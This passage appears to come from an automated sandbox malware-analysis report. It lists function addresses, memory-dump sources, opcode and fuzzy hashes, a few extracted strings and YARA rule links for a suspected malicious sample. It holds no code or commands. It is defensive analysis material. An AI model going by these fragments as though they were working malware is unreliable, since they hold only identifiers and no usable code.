                                                    • Instruction ID: 58a436aafb1b40f7e4c7c4e367d10bfce3be5fd85b03d716d36a4b26189deb4a
                                                    • Opcode Fuzzy Hash: 3b8d9ba272dd3897c3e20f0c975dca4aaf660934455dc13339c8d3136d4e8802
                                                    • Instruction Fuzzy Hash: 30D0925AA0F50BC5F1784761802023913D14F06704E608139C09F4B8C68D19F7096381
                                                    Function 00007FFAAC5839DB Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc17e8052113a1f7cdb599daa3e5cbec2f1a36ef8d0eef4cdec2f1d803d3964f
                                                    • Instruction ID: c2da715242f031de3169c6ae7055eb9c9e1ec258471ff08079e9a409781d6784
                                                    • Opcode Fuzzy Hash: cc17e8052113a1f7cdb599daa3e5cbec2f1a36ef8d0eef4cdec2f1d803d3964f
                                                    • Instruction Fuzzy Hash: A5C08C00E2C81A8AF909A32480106BF00539F80308F564472F80FCB6CECE0C5E0207CA
                                                    Function 00007FFAAC5806C8 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7f99d765c7a884f7d75e1cfdec0ed63725cc9eb6b232b34d2388067146774d8
                                                    • Instruction ID: 62e84ae6ac24f6660d7ca526e62e461a03c4aac4f5e1de023feba7dc8ddef9f9
                                                    • Opcode Fuzzy Hash: a7f99d765c7a884f7d75e1cfdec0ed63725cc9eb6b232b34d2388067146774d8
                                                    • Instruction Fuzzy Hash: 87B01210CD740F80B804337A0C4207570885F86100FC15070F40CC0081984D52DC23C6

                                                    Non-executed Functions

                                                    Function 00007FFAAC5809B0 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: 67a6c2c74c737a0240dd919b89a3de95e777c46b856b360fdcd8166775f3ec20
                                                    • Instruction ID: 2823f4f9dc6c4ae76fd89fcd199acc8b734a54cdfb9435e673ef62eb93df35eb
                                                    • Opcode Fuzzy Hash: 67a6c2c74c737a0240dd919b89a3de95e777c46b856b360fdcd8166775f3ec20
                                                    • Instruction Fuzzy Hash: E241C963A0D56386E10637FDB422AFD6B44DFCA375B49CA77E04DC92E34E09608583D5